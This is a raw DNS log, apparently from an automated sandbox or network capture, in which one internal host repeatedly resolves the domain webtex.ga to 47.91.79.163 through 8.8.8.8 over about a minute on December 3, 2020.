                                    Dec 3, 2020 10:02:57.888547897 CET8.8.8.8192.168.2.30x3f28No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.201248884 CET8.8.8.8192.168.2.30x1e87No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.506773949 CET8.8.8.8192.168.2.30x7da4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.794132948 CET8.8.8.8192.168.2.30x26b0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.090637922 CET8.8.8.8192.168.2.30x41a9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.359818935 CET8.8.8.8192.168.2.30x1b27No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.656177998 CET8.8.8.8192.168.2.30x9482No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.950726032 CET8.8.8.8192.168.2.30x4379No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.243922949 CET8.8.8.8192.168.2.30x59c6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.549401045 CET8.8.8.8192.168.2.30x15e8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.989443064 CET8.8.8.8192.168.2.30x2857No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.292546034 CET8.8.8.8192.168.2.30x34c8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.592231035 CET8.8.8.8192.168.2.30xae95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.866249084 CET8.8.8.8192.168.2.30xcd57No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.134548903 CET8.8.8.8192.168.2.30xc3ffNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.480504990 CET8.8.8.8192.168.2.30x54f1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.831958055 CET8.8.8.8192.168.2.30xb71bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.087317944 CET8.8.8.8192.168.2.30x6edfNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.367944956 CET8.8.8.8192.168.2.30x832aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.873424053 CET8.8.8.8192.168.2.30xd28eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.167690992 CET8.8.8.8192.168.2.30x355No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.561676025 CET8.8.8.8192.168.2.30x2882No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.026559114 CET8.8.8.8192.168.2.30x43dfNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.298940897 CET8.8.8.8192.168.2.30x803eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.958455086 CET8.8.8.8192.168.2.30x95f7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.223416090 CET8.8.8.8192.168.2.30xba9fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.492100954 CET8.8.8.8192.168.2.30xc3ecNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.793365002 CET8.8.8.8192.168.2.30x5723No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.097146988 CET8.8.8.8192.168.2.30x28aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.369294882 CET8.8.8.8192.168.2.30x8aefNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.667260885 CET8.8.8.8192.168.2.30x4a5cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.949558973 CET8.8.8.8192.168.2.30xeebaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.237628937 CET8.8.8.8192.168.2.30x52ffNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.530018091 CET8.8.8.8192.168.2.30x64a0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.815169096 CET8.8.8.8192.168.2.30xbdd8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.270598888 CET8.8.8.8192.168.2.30x220bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.656408072 CET8.8.8.8192.168.2.30xb11bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.050388098 CET8.8.8.8192.168.2.30x8a65No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.529567957 CET8.8.8.8192.168.2.30x3590No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.795329094 CET8.8.8.8192.168.2.30x82c7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.168389082 CET8.8.8.8192.168.2.30x460bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.471132994 CET8.8.8.8192.168.2.30x7c2aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.840190887 CET8.8.8.8192.168.2.30xf60bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.116857052 CET8.8.8.8192.168.2.30x220eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.969163895 CET8.8.8.8192.168.2.30xd70eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:15.802970886 CET8.8.8.8192.168.2.30x51d9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.248004913 CET8.8.8.8192.168.2.30xf658No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.686774969 CET8.8.8.8192.168.2.30xe36dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.101861954 CET8.8.8.8192.168.2.30xf6aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.576236963 CET8.8.8.8192.168.2.30xb93No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.257051945 CET8.8.8.8192.168.2.30x663fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.004000902 CET8.8.8.8192.168.2.30x4f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.347383022 CET8.8.8.8192.168.2.30x6067No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.852605104 CET8.8.8.8192.168.2.30xc41fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.141608000 CET8.8.8.8192.168.2.30x67b4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.612430096 CET8.8.8.8192.168.2.30xc411No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.892046928 CET8.8.8.8192.168.2.30x135fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.386265039 CET8.8.8.8192.168.2.30x7c7aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.965183020 CET8.8.8.8192.168.2.30x7a9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.239182949 CET8.8.8.8192.168.2.30x2061No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.737561941 CET8.8.8.8192.168.2.30x9a2dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.001060009 CET8.8.8.8192.168.2.30x5736No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.506064892 CET8.8.8.8192.168.2.30x2777No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.999000072 CET8.8.8.8192.168.2.30x10d0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:24.656239986 CET8.8.8.8192.168.2.30xb2fcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.160573959 CET8.8.8.8192.168.2.30xf47fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.638206959 CET8.8.8.8192.168.2.30xc2deNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.166709900 CET8.8.8.8192.168.2.30x2c89No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.777601957 CET8.8.8.8192.168.2.30xec75No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.047732115 CET8.8.8.8192.168.2.30x37feNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.569431067 CET8.8.8.8192.168.2.30xee9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.079176903 CET8.8.8.8192.168.2.30x268cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.347884893 CET8.8.8.8192.168.2.30xa636No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.974086046 CET8.8.8.8192.168.2.30xb2a4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.239267111 CET8.8.8.8192.168.2.30xcf41No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.883810997 CET8.8.8.8192.168.2.30x19d2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.455344915 CET8.8.8.8192.168.2.30x4f6bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.967179060 CET8.8.8.8192.168.2.30xe5a7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.238079071 CET8.8.8.8192.168.2.30x22c0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.728187084 CET8.8.8.8192.168.2.30x1998No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.992304087 CET8.8.8.8192.168.2.30xbd1bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.580051899 CET8.8.8.8192.168.2.30x5335No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.841048956 CET8.8.8.8192.168.2.30x235eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.414453983 CET8.8.8.8192.168.2.30xccc0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.915010929 CET8.8.8.8192.168.2.30xc68eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.424179077 CET8.8.8.8192.168.2.30xdef7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.920726061 CET8.8.8.8192.168.2.30xfaf1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.481955051 CET8.8.8.8192.168.2.30xa930No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.018115044 CET8.8.8.8192.168.2.30xea6eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.585150003 CET8.8.8.8192.168.2.30x7bf5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.073591948 CET8.8.8.8192.168.2.30xeb1bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.612159967 CET8.8.8.8192.168.2.30x58c7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.116751909 CET8.8.8.8192.168.2.30x8c94No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.593563080 CET8.8.8.8192.168.2.30xf10dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.132040977 CET8.8.8.8192.168.2.30x640dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.660496950 CET8.8.8.8192.168.2.30x2773No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.990310907 CET8.8.8.8192.168.2.30x1327No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.385514975 CET8.8.8.8192.168.2.30xb392No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.670334101 CET8.8.8.8192.168.2.30xd79cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.944808006 CET8.8.8.8192.168.2.30x2d9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.237742901 CET8.8.8.8192.168.2.30x2b7dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.528228045 CET8.8.8.8192.168.2.30x9e39No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.815978050 CET8.8.8.8192.168.2.30xbac6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.105398893 CET8.8.8.8192.168.2.30x91f1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.772661924 CET8.8.8.8192.168.2.30xabc8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.073678017 CET8.8.8.8192.168.2.30x1b62No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.386657953 CET8.8.8.8192.168.2.30xef30No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.663877010 CET8.8.8.8192.168.2.30xf5dbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.984477043 CET8.8.8.8192.168.2.30x66a8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.374341965 CET8.8.8.8192.168.2.30x3076No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.646862984 CET8.8.8.8192.168.2.30xa64fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.947272062 CET8.8.8.8192.168.2.30x18d1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.226454020 CET8.8.8.8192.168.2.30x16fcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.740957022 CET8.8.8.8192.168.2.30xf333No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.297924995 CET8.8.8.8192.168.2.30x8a44No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.772357941 CET8.8.8.8192.168.2.30x24bdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.294194937 CET8.8.8.8192.168.2.30x44edNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.856794119 CET8.8.8.8192.168.2.30xa991No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.421653986 CET8.8.8.8192.168.2.30x7ed0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.973506927 CET8.8.8.8192.168.2.30xed25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.368880033 CET8.8.8.8192.168.2.30x1f9bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.680624962 CET8.8.8.8192.168.2.30xdd43No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.319664955 CET8.8.8.8192.168.2.30x4dcbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.679482937 CET8.8.8.8192.168.2.30x3c4cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.212004900 CET8.8.8.8192.168.2.30xc3f4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.724632978 CET8.8.8.8192.168.2.30x9b59No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.989200115 CET8.8.8.8192.168.2.30x1acaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:52.518933058 CET8.8.8.8192.168.2.30xcf36No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.110177994 CET8.8.8.8192.168.2.30xa9feNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.719638109 CET8.8.8.8192.168.2.30xbf15No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.991311073 CET8.8.8.8192.168.2.30x86cdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:54.549211979 CET8.8.8.8192.168.2.30xb35eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.132646084 CET8.8.8.8192.168.2.30xf4fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.829653025 CET8.8.8.8192.168.2.30xa750No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.092653990 CET8.8.8.8192.168.2.30x2127No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.611583948 CET8.8.8.8192.168.2.30xaf39No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.127315044 CET8.8.8.8192.168.2.30x9ef3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.665216923 CET8.8.8.8192.168.2.30x6144No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.260405064 CET8.8.8.8192.168.2.30x7360No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.526932001 CET8.8.8.8192.168.2.30xc4a6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.794562101 CET8.8.8.8192.168.2.30x3dd1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.076771021 CET8.8.8.8192.168.2.30x5daNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.353662014 CET8.8.8.8192.168.2.30x9a3eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.636375904 CET8.8.8.8192.168.2.30x8d7fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.915659904 CET8.8.8.8192.168.2.30x3864No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.191922903 CET8.8.8.8192.168.2.30x3309No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.484050989 CET8.8.8.8192.168.2.30xf0dbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.766160965 CET8.8.8.8192.168.2.30x4800No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.144134998 CET8.8.8.8192.168.2.30x9a8fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.448929071 CET8.8.8.8192.168.2.30x674bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.737176895 CET8.8.8.8192.168.2.30x6b11No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.042148113 CET8.8.8.8192.168.2.30xb6d9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.409003019 CET8.8.8.8192.168.2.30xf523No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.688880920 CET8.8.8.8192.168.2.30xc521No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.969583988 CET8.8.8.8192.168.2.30xd047No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.259670019 CET8.8.8.8192.168.2.30x7eb0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.532891989 CET8.8.8.8192.168.2.30xf399No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.822348118 CET8.8.8.8192.168.2.30x1a21No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.101543903 CET8.8.8.8192.168.2.30xf5b1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.391450882 CET8.8.8.8192.168.2.30xf389No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.674464941 CET8.8.8.8192.168.2.30xd7e2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.942394018 CET8.8.8.8192.168.2.30x9e4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.226393938 CET8.8.8.8192.168.2.30xbd95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.510657072 CET8.8.8.8192.168.2.30x5da6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.796542883 CET8.8.8.8192.168.2.30xcb30No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.101805925 CET8.8.8.8192.168.2.30x8b25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.380043030 CET8.8.8.8192.168.2.30x181aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.662600994 CET8.8.8.8192.168.2.30x37caNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.977004051 CET8.8.8.8192.168.2.30x8014No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.251466990 CET8.8.8.8192.168.2.30x38f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.552763939 CET8.8.8.8192.168.2.30xd334No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.835998058 CET8.8.8.8192.168.2.30x7f82No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.244343996 CET8.8.8.8192.168.2.30x877No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.525451899 CET8.8.8.8192.168.2.30xa0f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.805875063 CET8.8.8.8192.168.2.30x15b0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.084884882 CET8.8.8.8192.168.2.30x5fccNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.352477074 CET8.8.8.8192.168.2.30x99c0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.641357899 CET8.8.8.8192.168.2.30x7e55No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.928231001 CET8.8.8.8192.168.2.30x99f5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.217499018 CET8.8.8.8192.168.2.30xa059No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.486563921 CET8.8.8.8192.168.2.30x80e6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.763757944 CET8.8.8.8192.168.2.30x29c1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.050237894 CET8.8.8.8192.168.2.30xac48No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.417982101 CET8.8.8.8192.168.2.30x9904No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.696677923 CET8.8.8.8192.168.2.30x3918No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.971090078 CET8.8.8.8192.168.2.30xb0f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.274544001 CET8.8.8.8192.168.2.30x18e8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.612289906 CET8.8.8.8192.168.2.30x5ef8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.891649008 CET8.8.8.8192.168.2.30x7295No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.171314955 CET8.8.8.8192.168.2.30x938aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.482465029 CET8.8.8.8192.168.2.30x33f4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.800709963 CET8.8.8.8192.168.2.30x2cb5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.097882986 CET8.8.8.8192.168.2.30xcfa8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.383955002 CET8.8.8.8192.168.2.30x6ed3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.670947075 CET8.8.8.8192.168.2.30x311aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.937441111 CET8.8.8.8192.168.2.30x4c98No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
